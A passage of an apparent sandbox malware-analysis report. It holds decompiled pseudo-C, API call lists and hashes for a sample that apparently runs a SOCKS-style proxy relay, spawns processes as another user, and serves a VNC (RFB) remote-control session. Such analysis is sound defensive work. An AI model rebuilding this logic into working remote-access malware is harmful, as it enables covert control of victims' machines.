    																 *(_t509 + 3) = ((0 |  *(_t510 - 0x5c) != 0x00000017) - 0x00000001 & 0x00000003) + 1;
    																if( *(_t510 + 0x54) != 0x17) {
    																	__eflags =  *(_t510 + 0x54) - 2;
    																	if( *(_t510 + 0x54) != 2) {
    																		goto L112;
    																	}
    																	_push(4);
    																	_t332 = _t510 - 0x58;
    																	L111:
    																	_t215 = _t509 + 4; // 0x4
    																	L012B1947();
    																	L012B1947(_t404 + _t509 - 2, _t510 - 0x5a, 2);
    																	_t497 = _t496 + _t404;
    																	__eflags = _t497;
    																	__imp__#20( *((intOrPtr*)(_t510 + 0x58)), _t509, _t497, 0, _t510 - 0x1f0,  *(_t510 + 0x60), _t215, _t332);
    																	goto L112;
    																}
    																_push(0x10);
    																_t332 = _t510 - 0x54;
    																goto L111;
    															}
    															__eflags =  *(_t510 + 0x54) - ( *(_t510 - 0x5c) & 0x0000ffff);
    															if( *(_t510 + 0x54) != ( *(_t510 - 0x5c) & 0x0000ffff)) {
    																goto L112;
    															}
    															goto L107;
    														}
    														_t317 = _t510 - 0x5c;
    														__imp__#17( *((intOrPtr*)(_t510 + 0x58)), _t509, _t403, 0, _t317, _t510 + 0x68);
    														_t405 = _t317;
    														__eflags = _t405;
    														if(_t405 <= 0) {
    															goto L113;
    														}
    														__eflags = _t405 - 6;
    														if(_t405 < 6) {
    															goto L103;
    														}
    														_t341 =  *(_t510 - 0x5c);
    														__eflags =  *(_t510 - 0x370) - _t341;
    														if( *(_t510 - 0x370) != _t341) {
    															goto L103;
    														}
    														__eflags = _t341 - 2;
    														if(_t341 != 2) {
    															__eflags = _t341 - 0x17;
    															if(_t341 != 0x17) {
    																L70:
    																__eflags =  *((char*)(_t509 + 2));
    																if( *((char*)(_t509 + 2)) != 0) {
    																	goto L103;
    																}
    																__eflags =  *_t509;
    																if( *_t509 != 0) {
    																	goto L103;
    																}
    																__eflags =  *(_t510 + 0x60);
    																if( *(_t510 + 0x60) == 0) {
    																	L012B1947(_t510 - 0x1f0, _t510 - 0x5c,  *(_t510 + 0x68));
    																	__eflags =  *((short*)(_t510 - 0x1f0)) - 0x17;
    																	if( *((short*)(_t510 - 0x1f0)) == 0x17) {
    																		 *((intOrPtr*)(_t510 - 0x1d8)) = 0;
    																		 *((intOrPtr*)(_t510 - 0x1ec)) = 0;
    																	}
    																	 *(_t510 + 0x60) =  *(_t510 + 0x68);
    																}
    																L012B19F6(_t510 - 0x5c, 0x80);
    																_t344 = ( *(_t509 + 3) & 0x000000ff) - 1;
    																__eflags = _t344;
    																if(_t344 == 0) {
    																	__eflags = _t405 - 0xa;
    																	if(_t405 <= 0xa) {
    																		goto L103;
    																	}
    																	_t345 = 2;
    																	 *(_t510 - 0x5c) = _t345;
    																	_t175 = _t509 + 4; // 0x4
    																	 *(_t510 + 0x68) = 0x10;
    																	L012B1947(_t510 - 0x58, _t175, 4);
    																	_push(8);
    																	goto L96;
    																} else {
    																	_t361 = _t344;
    																	__eflags = _t361;
    																	if(_t361 == 0) {
    																		_t362 =  *((intOrPtr*)(_t509 + 4));
    																		__eflags = _t362;
    																		if(_t362 == 0) {
    																			goto L103;
    																		}
    																		_t501 = _t362 & 0x000000ff;
    																		_t150 = _t501 + 7; // 0x7
    																		__eflags = _t405 - _t150;
    																		if(_t405 <= _t150) {
    																			goto L103;
    																		}
    																		_t151 = _t509 + 5; // 0x5
    																		L012B1947(_t510 - 0x2f0, _t151, _t501);
    																		 *(_t510 + 0x4c) = 0;
    																		_t368 = _t510 - 0x2f0;
    																		 *((char*)(_t510 + _t501 - 0x2f0)) = 0;
    																		_t498 = _t501 + 5;
    																		__imp__getaddrinfo(_t368, 0, 0, _t510 + 0x4c);
    																		__eflags = _t368;
    																		if(_t368 != 0) {
    																			goto L103;
    																		}
    																		_t483 = 0;
    																		__eflags = 0;
    																		do {
    																			_t369 =  *(_t510 + 0x4c);
    																			__eflags = _t369;
    																			if(_t369 == 0) {
    																				goto L89;
    																			}
    																			_t449 =  *((intOrPtr*)(_t510 + 0x30 + (_t483 & 0x000000ff) * 4));
    																			while(1) {
    																				__eflags =  *((intOrPtr*)(_t369 + 4)) - _t449;
    																				if( *((intOrPtr*)(_t369 + 4)) == _t449) {
    																					break;
    																				}
    																				_t369 =  *(_t369 + 0x1c);
    																				__eflags = _t369;
    																				if(_t369 != 0) {
    																					continue;
    																				}
    																				goto L89;
    																			}
    																			 *(_t510 + 0x68) =  *(_t369 + 0x10);
    																			L012B1947(_t510 - 0x5c,  *((intOrPtr*)(_t369 + 0x18)),  *(_t369 + 0x10));
    																			__eflags =  *(_t510 - 0x5c) - 0x17;
    																			if( *(_t510 - 0x5c) == 0x17) {
    																				 *(_t510 - 0x44) =  *(_t510 - 0x44) & 0x00000000;
    																				_t171 = _t510 - 0x58;
    																				 *_t171 =  *(_t510 - 0x58) & 0x00000000;
    																				__eflags =  *_t171;
    																			}
    																			__imp__freeaddrinfo( *(_t510 + 0x4c));
    																			L97:
    																			_t499 = _t498 + 2;
    																			__eflags =  *(_t510 + 0x5c) - 0xffffffff;
    																			 *(_t510 - 0x5a) =  *((intOrPtr*)(_t498 + _t509));
    																			if( *(_t510 + 0x5c) != 0xffffffff) {
    																				L100:
    																				__eflags = _t405 - _t499;
    																				if(_t405 > _t499) {
    																					__eflags =  *(_t510 + 0x54) - ( *(_t510 - 0x5c) & 0x0000ffff);
    																					if( *(_t510 + 0x54) == ( *(_t510 - 0x5c) & 0x0000ffff)) {
    																						_t500 = _t499 + _t509;
    																						__eflags = _t500;
    																						__imp__#20( *(_t510 + 0x5c), _t500, _t405 - _t499, 0, _t510 - 0x5c,  *(_t510 + 0x68));
    																					}
    																				}
    																				goto L103;
    																			}
    																			L012B19F6(_t510 - 0x270, 0x80);
    																			_t353 =  *(_t510 - 0x5c);
    																			 *(_t510 - 0x270) = _t353;
    																			 *(_t510 + 0x54) = _t353 & 0x0000ffff;
    																			_t317 = E012B1929(_t510 - 0x270);
    																			 *(_t510 + 0x5c) = _t317;
    																			__eflags = _t317 - 0xffffffff;
    																			if(_t317 == 0xffffffff) {
    																				goto L113;
    																			}
    																			__eflags =  *(_t510 + 0x54) - 0x17;
    																			_t359 = ((0 |  *(_t510 + 0x54) != 0x00000017) - 0x00000001 & 0x0000000c) + 0xa;
    																			__eflags = _t359;
    																			 *(_t510 + 0x38) = _t359;
    																			goto L100;
    																			L89:
    																			_t483 = _t483 + 1;
    																			__eflags = _t483 - 2;
    																		} while (_t483 < 2);
    																		goto L103;
    																	}
    																	__eflags = _t361 != 1;
    																	if(_t361 != 1) {
    																		goto L103;
    																	}
    																	__eflags = _t405 - 0x16;
    																	if(_t405 <= 0x16) {
    																		goto L103;
    																	}
    																	_t373 = 0x17;
    																	 *(_t510 - 0x5c) = _t373;
    																	_t146 = _t509 + 4; // 0x4
    																	 *(_t510 + 0x68) = 0x1c;
    																	L012B1947(_t510 - 0x54, _t146, 0x10);
    																	_push(0x14);
    																	L96:
    																	_pop(_t498);
    																	goto L97;
    																}
    															}
    															__eflags = L012B1735(_t510 - 0x368, _t510 - 0x54, 0x10);
    															L69:
    															if(__eflags != 0) {
    																goto L103;
    															}
    															goto L70;
    														}
    														__eflags =  *((intOrPtr*)(_t510 - 0x36c)) -  *(_t510 - 0x58);
    														goto L69;
    													}
    												}
    												 *((char*)(_t510 + 0x6c)) = 1;
    												goto L118;
    											}
    										}
    										 *((char*)(_t510 + 0x6c)) = 7;
    										goto L142;
    									}
    									L012B1933(_t505);
    									goto L41;
    								}
    								L36:
    								 *((char*)(_t510 + 0x6c)) = 1;
    								goto L39;
    							}
    							_t384 = _t280 - _t492;
    							__eflags = _t384;
    							if(_t384 == 0) {
    								_t385 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x67, 1,  *(_t510 + 0x68));
    								__eflags = _t385;
    								if(_t385 == 0) {
    									goto L41;
    								}
    								__eflags =  *(_t510 + 0x67);
    								if( *(_t510 + 0x67) == 0) {
    									goto L41;
    								}
    								_t387 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x470,  *(_t510 + 0x67) & 0x000000ff,  *(_t510 + 0x68));
    								__eflags = _t387;
    								if(_t387 == 0) {
    									goto L41;
    								}
    								 *((char*)(_t510 + ( *(_t510 + 0x67) & 0x000000ff) - 0x470)) = 0;
    								 *(_t510 + 0x44) = 0;
    								_t390 = _t510 - 0x470;
    								__imp__getaddrinfo(_t390, 0, 0, _t510 + 0x44);
    								__eflags = _t390;
    								if(_t390 == 0) {
    									_t487 = 0;
    									__eflags = 0;
    									do {
    										_t391 =  *(_t510 + 0x44);
    										__eflags = _t391 - _t505;
    										if(_t391 != _t505) {
    											_t457 =  *((intOrPtr*)(_t510 + 0x30 + (_t487 & 0x000000ff) * 4));
    											while(1) {
    												__eflags =  *((intOrPtr*)(_t391 + 4)) - _t457;
    												if( *((intOrPtr*)(_t391 + 4)) == _t457) {
    													break;
    												}
    												_t391 =  *(_t391 + 0x1c);
    												__eflags = _t391;
    												if(_t391 != 0) {
    													continue;
    												}
    												goto L27;
    											}
    											_t505 = L012B142E( *((intOrPtr*)(_t391 + 0x18)),  *((intOrPtr*)(_t391 + 0x10)));
    											 *(_t510 + 0x48) = _t505;
    											__eflags = _t505;
    											if(_t505 != 0) {
    												__eflags =  *_t505 - 0x17;
    												if( *_t505 == 0x17) {
    													 *(_t505 + 0x18) =  *(_t505 + 0x18) & 0x00000000;
    													 *(_t505 + 4) =  *(_t505 + 4) & 0x00000000;
    												}
    											} else {
    												 *((char*)(_t510 + 0x6c)) = 1;
    											}
    											L29:
    											__imp__freeaddrinfo( *(_t510 + 0x44));
    											goto L39;
    										}
    										L27:
    										_t487 = _t487 + 1;
    										__eflags = _t487 - 2;
    									} while (_t487 < 2);
    									 *((char*)(_t510 + 0x6c)) = 4;
    									goto L29;
    								} else {
    									 *((char*)(_t510 + 0x6c)) = 4;
    									goto L39;
    								}
    							}
    							__eflags = _t384 != 1;
    							if(_t384 != 1) {
    								goto L41;
    							}
    							_t394 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x6c, _t402,  *(_t510 + 0x68));
    							__eflags = _t394;
    							if(_t394 == 0) {
    								goto L41;
    							}
    							_t460 = 0x1c;
    							_t505 = L012B1C17(_t460);
    							 *(_t510 + 0x48) = _t505;
    							__eflags = _t505;
    							if(_t505 == 0) {
    								goto L36;
    							} else {
    								_t396 = 0x17;
    								 *_t505 = _t396;
    								_push(_t402);
    								_push(_t510 - 0x6c);
    								_t39 = _t505 + 8; // 0x8
    								_t285 = _t39;
    								goto L38;
    							}
    						}
    					} else {
    						_t268 = 1;
    						L42:
    						return _t268;
    					}
    				}
    			}

    APIs
    • getsockname.WS2_32(?,?,?), ref: 012C9A38
    • getpeername.WS2_32(?,?,?), ref: 012C9A54
    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 012C9AF5
    • recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 012C9B23
    • recvfrom.WS2_32(?,00000000,0000FFFF,00000000,?,?), ref: 012C9B5E
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 012C9C95
    • freeaddrinfo.WS2_32(?,?,?,?), ref: 012C9CF0
    • sendto.WS2_32(?,00000006,00000000,00000000,?,?), ref: 012C9D9C
    • recvfrom.WS2_32(?,0000FFFF,0000FFFF,00000000,?,?), ref: 012C9DDE
    • sendto.WS2_32(?,00000000,00000000,00000000,?,?), ref: 012C9E51
    • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 012C9E90
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: recvfromselectsendto$freeaddrinfogetaddrinfogetpeernamegetsocknamerecv
    • String ID:
    • API String ID: 1548934455-0
    • Opcode ID: 623ba8c8ed545d2b69927adfc1598c27f64b09332f1b6c874dc431a10fe5fae4
    • Instruction ID: de16ed85a9293762c54642cdc4e5f2fe1cdc83d3c1805575beabbbf4e30b557f
    • Opcode Fuzzy Hash: 623ba8c8ed545d2b69927adfc1598c27f64b09332f1b6c874dc431a10fe5fae4
    • Instruction Fuzzy Hash: 1D42CF7192028A9BDF25DFA4C884BFE3BB9BF04748F10421EEB5597291E771C985CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E012BBAD7(void* __ecx, intOrPtr __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, struct _STARTUPINFOW* _a16, intOrPtr _a20) {
    				struct _SECURITY_ATTRIBUTES* _v5;
    				char _v12;
    				struct _SECURITY_ATTRIBUTES* _v16;
    				void* _v20;
    				struct HINSTANCE__* _v24;
    				intOrPtr _v28;
    				struct _PROCESS_INFORMATION _v44;
    				intOrPtr _v104;
    				char _v112;
    				struct HINSTANCE__* _t35;
    				void* _t41;
    				struct _STARTUPINFOW* _t57;
    				WCHAR* _t59;
    				char _t60;
    				intOrPtr* _t62;
    				intOrPtr* _t68;
    
    				_v28 = __edx;
    				_v20 = __ecx;
    				_v5 = 0;
    				_t35 = LoadLibraryA("userenv.dll");
    				_v24 = _t35;
    				if(_t35 != 0) {
    					_t62 = GetProcAddress(_t35, "CreateEnvironmentBlock");
    					_t68 = GetProcAddress(_v24, "DestroyEnvironmentBlock");
    					if(_t62 != 0 && _t68 != 0) {
    						_v16 = 0;
    						_t41 =  *_t62( &_v16, _v20, 0);
    						if(_t41 != 0) {
    							_t41 = _v16;
    						} else {
    							_v16 = _t41;
    						}
    						_v12 = 0;
    						_t57 = _a16;
    						if(_t57 == 0) {
    							_t60 = 0x44;
    							L012B15F5( &_v112,  &_v112, 0, _t60);
    							_v104 = _v28;
    							_t41 = _v16;
    							_v112 = _t60;
    							_t57 =  &_v112;
    						}
    						_t59 = _a8;
    						if(_t59 == 0) {
    							_t59 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_v20, _a4, _t59, 0, 0, 0,  ~_t41 & 0x00000400 | 0x04000000, _t41, _a12, _t57,  &_v44) != 0) {
    							if(_a20 == 0) {
    								CloseHandle(_v44.hThread);
    								CloseHandle(_v44);
    							} else {
    								L012B1947(_a20,  &_v44, 0x10);
    							}
    							_v5 = _v44.dwProcessId != 0;
    						}
    						if(_v16 != 0) {
    							 *_t68(_v16);
    						}
    					}
    					FreeLibrary(_v24);
    				}
    				return _v5 & 0x000000ff;
    			}

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll), ref: 012BBAEE
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 012BBB0D
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 012BBB19
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?,?,?,?), ref: 012BBB9C
    • CloseHandle.KERNEL32(?), ref: 012BBBC3
    • CloseHandle.KERNEL32(?), ref: 012BBBC8
    • FreeLibrary.KERNEL32(?), ref: 012BBBDE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: 80e361039eb868d51a6d05c525408898be9ba5aaa85279a6f6ee297f000d2cb1
    • Instruction ID: 63b50b9af0edc96d96262f47cc3d7520da77e527d5032e275bd4614af4ede7ee
    • Opcode Fuzzy Hash: 80e361039eb868d51a6d05c525408898be9ba5aaa85279a6f6ee297f000d2cb1
    • Instruction Fuzzy Hash: CB314C72D1020EAFDF209FA9DC85DEEBFB9EB44344F04446AEA01B7154E6359940CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E012CAFE4(char __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed char _a15, void* _a16, intOrPtr _a20) {
    				char _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v21;
    				signed short _v23;
    				signed int _v24;
    				signed int _v28;
    				char _v29;
    				signed int _v36;
    				signed int _v40;
    				short _v45;
    				short _v47;
    				char _v48;
    				char _v53;
    				char _v56;
    				char _v57;
    				char _v60;
    				char _v64;
    				intOrPtr _v68;
    				signed int _v81;
    				char _v82;
    				unsigned int _v84;
    				signed int _v88;
    				char _v104;
    				signed short _v106;
    				signed short _v108;
    				void* _v113;
    				char _v116;
    				char _v120;
    				char _v128;
    				char _v384;
    				char _v640;
    				void* __ebx;
    				void* __esi;
    				void* _t219;
    				char _t220;
    				signed char _t221;
    				void* _t226;
    				signed int _t233;
    				void* _t250;
    				signed int _t255;
    				signed int _t258;
    				signed int _t259;
    				signed int _t260;
    				signed int _t261;
    				signed int _t262;
    				void* _t269;
    				void* _t274;
    				void* _t277;
    				signed int _t286;
    				signed int _t287;
    				signed int _t288;
    				signed short _t292;
    				unsigned int _t293;
    				signed int _t295;
    				signed int _t296;
    				signed int _t297;
    				intOrPtr _t299;
    				signed int _t303;
    				signed int _t304;
    				signed int _t308;
    				signed int _t310;
    				signed int _t311;
    				signed int _t312;
    				signed int _t319;
    				signed int _t320;
    				signed int _t321;
    				signed char _t324;
    				signed char _t326;
    				signed char _t328;
    				signed int _t340;
    				signed int _t349;
    				signed int _t356;
    				signed int _t357;
    				signed int _t365;
    				void* _t370;
    				signed int _t375;
    				signed int _t376;
    				signed int _t391;
    				void* _t392;
    				unsigned int _t446;
    				signed char _t459;
    				void* _t500;
    				void* _t504;
    				signed int _t517;
    				signed int _t519;
    				signed int _t528;
    				signed int _t529;
    				void* _t542;
    				intOrPtr _t546;
    				signed int _t548;
    				signed int _t549;
    				signed int _t553;
    				intOrPtr _t558;
    				void* _t559;
    
    				_v68 = __edx;
    				_v8 = __ecx;
    				_t220 = L012B182A(_t219, __ecx, "RFB 003.003\n", 0xc);
    				if(_t220 == 0) {
    					L108:
    					return _t220;
    				}
    				_t220 = L012B19E7(_v8,  &_v64, 0xc, _v68);
    				if(_t220 == 0) {
    					goto L108;
    				}
    				_t220 = L012B16C2(_t220,  &_v64, "RFB ", 4, 4);
    				if(_t220 != 0) {
    					goto L108;
    				}
    				_v57 = _t220;
    				_v53 = _t220;
    				_t221 = L012B134D( &_v56, 0);
    				_t226 = ((L012B134D( &_v60, 0) & 0x000000ff | (_t221 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t226 > 0x300) {
    					L107:
    					return _t226;
    				} else {
    					_t558 = _a4;
    					_v36 = _v36 & 0x00000000;
    					_v12 = 1;
    					 *((intOrPtr*)(_t558 + 4))( &_v36, _t542, _t370);
    					_v40 = (_v12 & 0x00ff0000 | _v12 >> 0x00000010) >> 0x00000008 | (_v12 & 0x0000ff00 | _v12 << 0x00000010) << 0x00000008;
    					_t405 = _v8;
    					if(L012B182A(_v12 << 0x10, _v8,  &_v40, 4) == 0) {
    						_v12 = _v12 | 0xffffffff;
    					}
    					_t233 = _v12;
    					if(_t233 == 0) {
    						_t226 = E012CAF7F(_t405, __eflags, _v8, _v36);
    						L106:
    						goto L107;
    					}
    					_t226 = _t233 - 1;
    					if(_t226 != 0) {
    						goto L106;
    					}
    					_t226 = L012B19E7(_v8,  &_v29, 1, _v68);
    					if(_t226 == 0) {
    						goto L106;
    					}
    					_t226 =  *((intOrPtr*)(_t558 + 8))();
    					if(_t226 == 0) {
    						goto L106;
    					}
    					_v36 = _v36 & 0x00000000;
    					_t226 =  *((intOrPtr*)(_t558 + 0xc))( &_v128);
    					_t374 = _t226;
    					_t572 = _t226;
    					if(_t226 == 0) {
    						goto L106;
    					}
    					_t226 = E012CADCF( &_v128, _t374, _t572, _a8, _a12);
    					_t559 = _t226;
    					if(_t559 == 0) {
    						goto L106;
    					}
    					_t375 = L012B1BE0(_v36);
    					_v108 =  *(_t559 + 8) << 0x00000008 |  *(_t559 + 9) & 0x000000ff;
    					_v106 =  *(_t559 + 0xa) << 0x00000008 |  *(_t559 + 0xb) & 0x000000ff;
    					_v88 = (_t375 & 0x00ff0000 | _t375 >> 0x00000010) >> 0x00000008 | (_t375 << 0x00000010 | _t375 & 0x0000ff00) << 0x00000008;
    					_t48 = _t559 + 0x20; // 0x20
    					_t250 = L012B1947( &_v104, _t48, 0x10);
    					asm("rol word [ebp-0x60], 0x8");
    					asm("rol word [ebp-0x5e], 0x8");
    					asm("rol word [ebp-0x5c], 0x8");
    					if(L012B182A(_t250, _v8,  &_v108, 0x18) == 0 || _t375 != 0 && L012B182A(_t251, _v8, _v36, _t375) == 0) {
    						_t226 = E012CAF4C(_t559);
    						goto L106;
    					} else {
    						_v47 = 0xffff;
    						_v48 = 0;
    						_v45 = 0xffff;
    						L012B19F6( &_v384, 0xff);
    						L012B19F6( &_v640, 0xff);
    						_v12 = _v12 & 0x00000000;
    						_v28 = _v28 & 0x00000000;
    						goto L16;
    						do {
    							do {
    								while(1) {
    									L16:
    									_t376 = 0;
    									if(_v12 <= 0) {
    										goto L35;
    									}
    									L17:
    									_t269 = L012B10C8( &_v8, 1, _a20, 0, 0);
    									if(_t269 != 0xffffffff) {
    										goto L35;
    									}
    									__imp__#111();
    									if(_t269 != 0x274c) {
    										L103:
    										E012CAF4C(_t559);
    										_t226 = L012B1933(_v28);
    										goto L106;
    									}
    									if(_a16 != 0) {
    										WaitForSingleObject(_a16, 0xffffffff);
    									}
    									 *((intOrPtr*)(_a4 + 0x10))();
    									_v16 = _t376;
    									if(_v12 <= _t376) {
    										L33:
    										if(_a16 != _t376) {
    											ReleaseMutex(_a16);
    										}
    										while(1) {
    											L16:
    											_t376 = 0;
    											if(_v12 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									} else {
    										_t392 = 0;
    										_t548 = _v12 * 9;
    										do {
    											_t274 = _v28 + _t392;
    											if( *((short*)(_t274 + 5)) > 0 &&  *((short*)(_t274 + 7)) > 0) {
    												_push(_t274);
    												_push(_v8);
    												_t277 = E012CAAB5(_t559);
    												if(_t277 == 0xffffffff || _t277 == 0) {
    													__eflags = _a16;
    													if(_a16 != 0) {
    														ReleaseMutex(_a16);
    													}
    													goto L103;
    												} else {
    													if(_t277 == 1) {
    														if(_v16 + 1 != _v12) {
    															_t504 = 9;
    															L012B19F6(_t392 + _v28, _t504);
    														} else {
    															_v12 = _v12 - 1;
    															_t548 = _t548 - 9;
    															L012B1C26( &_v28, _t548);
    														}
    													}
    													goto L31;
    												}
    											}
    											L31:
    											_v16 = _v16 + 1;
    											_t392 = _t392 + 9;
    										} while (_v16 < _v12);
    										_t376 = 0;
    										goto L33;
    									}
    									L35:
    									_t546 = _v68;
    									_t255 = L012B19E7(_v8,  &_a15, 1, _t546);
    									__eflags = _t255;
    									if(_t255 == 0) {
    										goto L103;
    									}
    									_t258 = (_a15 & 0x000000ff) - _t376;
    									__eflags = _t258;
    									if(_t258 == 0) {
    										_push(_t546);
    										_t500 = 3;
    										_t259 = L012B1B90(_v8, _t500);
    										__eflags = _t259;
    										if(_t259 == 0) {
    											goto L103;
    										}
    										_t260 = L012B19E7(_v8,  &_v84, 0x10, _t546);
    										__eflags = _t260;
    										if(_t260 == 0) {
    											goto L103;
    										}
    										_t261 = E012CAD8B( &_v84, _t376);
    										__eflags = _t261;
    										if(_t261 == 0) {
    											goto L103;
    										}
    										asm("rol word [ebp-0x4c], 0x8");
    										asm("rol word [ebp-0x4a], 0x8");
    										asm("rol word [ebp-0x48], 0x8");
    										__eflags = _v81 - _t376;
    										_t262 = _t261 & 0xffffff00 | _v81 != _t376;
    										__eflags = _v82 - _t376;
    										_v81 = _t262;
    										_v82 = _t262 & 0xffffff00 | _v82 != _t376;
    										_t211 = _t559 + 0x31; // 0x31
    										L012B1947(_t211,  &_v84, 0x10);
    										 *(_t559 + 0x41) = _v84 >> 3;
    										while(1) {
    											L16:
    											_t376 = 0;
    											if(_v12 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									}
    									_t286 = _t258;
    									__eflags = _t286;
    									if(_t286 == 0) {
    										_t287 = L012B1B90(_v8, 1, _t546);
    										__eflags = _t287;
    										if(_t287 == 0) {
    											goto L103;
    										}
    										_t288 = L012B19E7(_v8,  &_a8, 2, _t546);
    										__eflags = _t288;
    										if(_t288 == 0) {
    											goto L103;
    										}
    										_t292 = (_a8 & 0xff) << 0x00000008 | (_a8 & 0x0000ffff) >> 0x00000008;
    										 *(_t559 + 0x4c) = _t376;
    										 *(_t559 + 0x48) = _t292;
    										__eflags = _t292 - _t376;
    										if(_t292 <= _t376) {
    											L90:
    											_t549 = 0xff00;
    											L91:
    											_t293 =  *(_t559 + 0x4c);
    											 *(_t559 + 0x50) = (_t293 << 0x00000010 | _t293 & _t549) << 0x00000008 | _t293 >> 0x00000008 & _t549 |  *(_t559 + 0x4f) & 0x000000ff;
    											__eflags = _t293 - 5;
    											if(_t293 != 5) {
    												L012B1933( *(_t559 + 0x1c));
    												 *(_t559 + 0x1c) =  *(_t559 + 0x1c) & 0x00000000;
    												while(1) {
    													L16:
    													_t376 = 0;
    													if(_v12 <= 0) {
    														goto L35;
    													}
    													goto L17;
    												}
    											}
    											break;
    										}
    										_t378 = (_t292 & 0x0000ffff) << 2;
    										_t172 = _t559 + 0x44; // 0x44
    										_t296 = L012B1C26(_t172, (_t292 & 0x0000ffff) << 2);
    										__eflags = _t296;
    										if(_t296 == 0) {
    											goto L103;
    										}
    										_t297 = L012B19E7(_v8,  *((intOrPtr*)(_t559 + 0x44)), _t378, _t546);
    										__eflags = _t297;
    										if(_t297 == 0) {
    											goto L103;
    										}
    										_v16 = _v16 & 0x00000000;
    										__eflags = 0 -  *(_t559 + 0x48);
    										if(0 >=  *(_t559 + 0x48)) {
    											goto L90;
    										}
    										_t299 =  *((intOrPtr*)(_t559 + 0x44));
    										do {
    											_t517 = _v16 & 0x0000ffff;
    											_t445 = _t299 + _t517 * 4;
    											_t549 = 0xff00;
    											 *_t445 = ( *(_t299 + _t517 * 4) << 0x00000010 |  *(_t299 + _t517 * 4) & 0x0000ff00) << 0x00000008 | _t445[0] & 0x000000ff |  *(_t299 + _t517 * 4) >> 0x00000008 & 0x0000ff00;
    											_t299 =  *((intOrPtr*)(_t559 + 0x44));
    											_t446 = 5;
    											__eflags =  *(_t299 + _t517 * 4) - _t446;
    											if( *(_t299 + _t517 * 4) == _t446) {
    												 *(_t559 + 0x4c) = _t446;
    											}
    											_v16 = _v16 + 1;
    											__eflags = _v16 -  *(_t559 + 0x48);
    										} while (_v16 <  *(_t559 + 0x48));
    										goto L91;
    									}
    									_t303 = _t286 - 1;
    									__eflags = _t303;
    									if(_t303 == 0) {
    										_t304 = L012B19E7(_v8,  &_v60, 9, _t546);
    										__eflags = _t304;
    										if(_t304 == 0) {
    											goto L103;
    										}
    										asm("rol word [ebp-0x37], 0x8");
    										asm("rol word [ebp-0x35], 0x8");
    										asm("rol word [ebp-0x33], 0x8");
    										asm("rol word [ebp-0x31], 0x8");
    										__eflags = _v60 - _t376;
    										_t519 = _v12;
    										_v60 = _t304 & 0xffffff00 | _v60 != _t376;
    										__eflags = _t519;
    										if(_t519 == 0) {
    											L76:
    											__eflags = _t376 - _t519;
    											if(_t376 != _t519) {
    												L78:
    												L012B1947(_t376 * 9 + _v28,  &_v60, 9);
    												while(1) {
    													L16:
    													_t376 = 0;
    													if(_v12 <= 0) {
    														goto L35;
    													}
    													goto L17;
    												}
    												goto L35;
    											}
    											_v12 = _t519 + 1;
    											_t308 = L012B1C26( &_v28, (_t519 + 1) * 9);
    											__eflags = _t308;
    											if(_t308 == 0) {
    												goto L103;
    											}
    											goto L78;
    										}
    										_t310 = _v28 + 7;
    										__eflags = _t310;
    										do {
    											__eflags =  *((short*)(_t310 - 2));
    											if( *((short*)(_t310 - 2)) != 0) {
    												goto L75;
    											}
    											__eflags =  *_t310;
    											if( *_t310 == 0) {
    												goto L76;
    											}
    											L75:
    											_t376 = _t376 + 1;
    											_t310 = _t310 + 9;
    											__eflags = _t376 - _t519;
